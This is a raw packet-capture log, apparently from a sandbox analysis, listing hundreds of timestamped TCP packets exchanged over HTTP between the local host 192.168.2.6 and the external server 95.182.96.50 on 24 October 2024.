Oct 24, 2024 13:54:19.496396065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496400118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496443033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496443987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496520996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496524096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496563911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496576071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496618032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496629953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496686935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496714115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496728897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496737003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496772051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496782064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496804953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496815920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496848106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496886969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496901989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496937037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496946096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496994019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497026920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497047901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497064114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497078896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497098923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497107029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497136116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497138977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497170925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497179985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497225046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497256994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497272015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497298956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497304916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497364044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497411966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497421980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497473001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497507095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497518063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497544050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497597933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497600079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497642040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497649908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497684956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497716904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497729063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497756004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497792959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497797012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497829914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497838020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497864008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497898102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497908115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497931957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497966051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.497993946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.497996092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498029947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498042107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498064041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498096943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498110056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498131990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498138905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498167992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498168945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498205900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498212099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498239994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498244047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498275995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498280048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498311043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498315096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498347044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498352051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498380899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498385906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498418093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.498421907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.498541117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613436937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613481998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613537073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613539934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613579988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613598108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613713026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613761902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613768101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613806009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613850117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613858938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613897085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613897085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613933086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.613981962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.613986015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614021063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614049911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614063025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614090919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614134073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614135027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614209890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614248037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614259958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614300966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614335060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614345074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614370108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614377022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614412069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614447117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614456892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614485025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614526033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614533901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614558935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614567041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614589930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614624977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614634037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614658117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614691973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614701986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614725113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614744902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614758968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614761114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614794970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614830971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614837885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614864111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614885092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614892960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614906073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614929914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614936113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.614965916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.614969015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615000010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615006924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615036011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615051031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615071058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615081072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615106106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615109921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615142107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615175962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615187883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615211010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615222931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615246058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615255117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615281105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615286112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615341902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615374088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615385056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615407944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615416050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615446091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615480900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615497112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615516901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615550995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615576982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615583897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615586996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615619898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615654945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615664005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615690947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615725040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615734100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615761995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615766048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615797997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615833044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.615840912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.615900993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.726851940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.726912022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.726917028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.726957083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.726969004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727006912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727011919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727046967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727049112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727088928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727108955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727149963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727163076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727200985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727206945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727242947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727255106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727292061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727298021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727329969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727351904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727395058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727407932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727452040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727473021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727514982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727529049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727572918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727587938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727628946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727638960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727673054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727679968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727706909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727715015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727747917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727750063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727786064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727788925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727830887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727840900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727874994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727879047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727912903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.727917910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727953911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.727969885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728013992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728023052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728059053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728065968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728094101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728106976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728133917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728137970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728168011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728176117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728207111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728209972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728240967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728247881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728281975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728296995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728338957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728351116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728388071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728391886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728425026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728441954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728486061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728507996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728552103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728562117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728598118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728605032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728632927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728663921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728668928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728678942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728707075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728708029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728749990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728760958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728805065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728805065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728836060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728847980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728878021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728895903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728930950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728935957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.728965998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.728972912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729005098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729007006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729038000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729042053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729074001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729079962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729109049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729118109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729150057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729151011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729192972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729193926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729228973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729233980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729264021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729271889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729299068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729305983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729335070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729346991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729370117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729377985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729399920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729408026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729434967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729443073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729469061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729475021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729504108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729510069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729540110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729545116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729573965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729581118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729612112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729615927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729643106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.729655027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.729684114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842271090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842305899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842344046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842396021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842427969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842453957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842462063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842494965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842503071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842514038 CEST	49714	80	192.168.2.6	95.182.96.50
